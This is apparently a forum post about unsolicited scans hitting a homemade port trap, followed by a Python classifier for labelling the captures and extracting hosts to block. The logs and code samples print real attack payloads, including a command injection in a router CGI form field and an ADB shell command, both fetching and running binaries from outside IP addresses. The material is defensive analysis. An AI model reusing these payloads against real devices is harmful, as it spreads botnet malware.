
Intensive 586 (ms-shuttle) port scan/exploit/hacking attempts

Çağlar Arlı


Recently I wanted to play a bit with TCP/UDP networking (and touch some custom HTTP server implementation) in C# and found out that I'm getting requests from totally unknown dudes, such as this one:

   FROM: [::ffff:149.129.139.48]:52306
   [ANS]
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 222
Content-Type: application/x-www-form-urlencoded

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://107.174.133.119/bins/keksec.arm7;chmod+777+keksec.arm7;./keksec.arm7;rm+-rf+keksec.arm7%3b%23&remoteSubmit=Save

Then I decided to go further and made a mass port trap from 90 to 10000, and I found that the most intensive one is port 568, which is listed as the ms-shuttle/smb port. Here are some samples:


[25.11.2020 21:53:46]
   FROM: [::ffff:181.188.133.9]:55852
   [ANS]
| UTF8:
 &�     Cookie: mstshash=hello
      
--------------------
[25.11.2020 21:53:33]
   FROM: [::ffff:185.176.222.39]:64787 // <= this dude was spamming me for like 2-4 hrs
   [ANS]
| UTF8:
 *�     Cookie: mstshash=Administr
      
--------------------
[25.11.2020 16:07:01]
   FROM: [::ffff:118.233.192.126]:48964
   [ANS]
| UTF8:
 X      �  �  ����shell:>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget http://5.252.194.137/wget; sh wget; busybox wget http://5.252.194.137/bwget; sh bwget; busybox curl http://5.252.194.137/bcurl > bcurl; sh bcurl; curl http://5.252.194.137/curl > curl; sh curl  

I tried to search for some info about this port and the knock-knocks on it, but didn't succeed. My log file size now exceeds 2 MB, so I wonder: why is this happening? Why is this port being bombed so actively? And, probably, what should I do to prevent receiving those requests?
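The three captures in the post are recognisable on sight: `Cookie: mstshash=` is the routing cookie of an RDP X.224 Connection Request (the scanner is looking for RDP, whatever port it lands on), `shell:` preceded by a 24-byte binary header is an ADB OPEN message aimed at exposed Android Debug Bridge daemons, and the POST to `/cgi-bin/ViewLog.asp` smuggles a shell command through the `remote_host` form field. The following is an added example, not the asker's C# port trap: a small Python classifier that labels such captures and pulls out the usernames tried and the download hosts, which is what you would want before deciding what to block. The label names are this example's own; the sample payloads are constructed here to mirror the post's captures (the binary prefixes are rebuilt from the RDP and ADB message layouts rather than copied from the log, and the ADB command is shortened).

```python
"""Classify unsolicited connections captured by a TCP port trap and extract
the indicators worth blocking. Added example; label names are hypothetical."""
import re
import struct
from collections import Counter
from dataclasses import dataclass, field
from urllib.parse import unquote_plus, urlparse


def rdp_connection_request(cookie_user: str) -> bytes:
    """Build an RDP X.224 Connection Request as scanners send it:
    TPKT header + X.224 CR + 'Cookie: mstshash=<user>' + RDP_NEG_REQ."""
    cookie = f"Cookie: mstshash={cookie_user}\r\n".encode()
    neg_req = b"\x01\x00\x08\x00" + b"\x03\x00\x00\x00"  # type 1, len 8, SSL|HYBRID
    x224 = b"\xe0\x00\x00\x00\x00\x00" + cookie + neg_req  # CR, dst/src ref, class
    x224 = bytes([len(x224)]) + x224                       # LI byte (excludes itself)
    return b"\x03\x00" + (4 + len(x224)).to_bytes(2, "big") + x224


def adb_open(service: str, local_id: int = 1) -> bytes:
    """Build an ADB OPEN message: 24-byte header (command, arg0, arg1,
    data length, data checksum, command ^ 0xFFFFFFFF) + NUL-terminated service."""
    payload = service.encode() + b"\x00"
    cmd = 0x4E45504F  # A_OPEN; little-endian it reads "OPEN" on the wire
    header = struct.pack("<IIIIII", cmd, local_id, 0, len(payload),
                         sum(payload) & 0xFFFFFFFF, cmd ^ 0xFFFFFFFF)
    return header + payload


@dataclass
class Hit:
    label: str
    details: dict = field(default_factory=dict)
    urls: list = field(default_factory=list)

    @property
    def hosts(self) -> list:
        return sorted({urlparse(u).hostname for u in self.urls})


URL_RE = re.compile(r"https?://[^\s;&'\"<>]+")
SHELL_META = re.compile(r"[;|`]|\$\(|&&")   # heuristic: shell separators in form data


def classify(payload: bytes) -> Hit:
    text = payload.decode("latin-1")          # lossless one-char-per-byte view
    if "Cookie: mstshash=" in text:           # RDP X.224 CR routing cookie
        user = re.search(r"mstshash=([^\r\n]*)", text).group(1)
        return Hit("rdp-probe", {"username": user})
    if text[:4] == "OPEN" and "shell:" in text:   # ADB OPEN for the shell service
        cmd = text[text.index("shell:") + 6:].rstrip("\x00")
        return Hit("adb-shell", {"command": cmd}, URL_RE.findall(cmd))
    m = re.match(r"([A-Z]+) (\S+) HTTP/1\.[01]\r\n", text)
    if m:
        _, _, body = text.partition("\r\n\r\n")
        decoded = unquote_plus(body)          # %3b -> ';', '+' -> ' '
        label = "http-cmd-injection" if SHELL_META.search(decoded) else "http-probe"
        return Hit(label, {"method": m.group(1), "path": m.group(2)},
                   URL_RE.findall(decoded))
    return Hit("unknown")


def summarize(captures):
    """Per-label counts plus the distinct download hosts seen across captures."""
    hits = [classify(p) for p in captures]
    return Counter(h.label for h in hits), sorted({x for h in hits for x in h.hosts})


# Constructed samples mirroring the post's captures.
POST_BODY = ("remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0"
             "&remote_host=%3bcd+/tmp;wget+http://107.174.133.119/bins/keksec.arm7;"
             "chmod+777+keksec.arm7;./keksec.arm7;rm+-rf+keksec.arm7%3b%23&remoteSubmit=Save")
HTTP_POST = ("POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\n"
             "User-Agent: B4ckdoor-owned-you\r\nContent-Type: application/x-www-form-urlencoded\r\n"
             f"Content-Length: {len(POST_BODY)}\r\n\r\n{POST_BODY}").encode()
ADB_CMD = (">/data/local/tmp/.x && cd /data/local/tmp; rm -rf wget bwget bcurl curl; "
           "wget http://5.252.194.137/wget; sh wget; busybox wget http://5.252.194.137/bwget; "
           "sh bwget; busybox curl http://5.252.194.137/bcurl > bcurl; sh bcurl; "
           "curl http://5.252.194.137/curl > curl; sh curl")
SAMPLES = [rdp_connection_request("hello"), rdp_connection_request("Administr"),
           adb_open("shell:" + ADB_CMD), HTTP_POST]

if __name__ == "__main__":
    for s in SAMPLES:
        h = classify(s)
        print(h.label, h.details.get("username") or h.details.get("path", ""), h.hosts)
    print(summarize(SAMPLES))
```

Feeding a day of captures through `summarize` gives you the counts that answer "what is hitting this port" and the host list to drop at the firewall; the RDP probes carry no URL, so for those the indicator is the source address and the username being guessed.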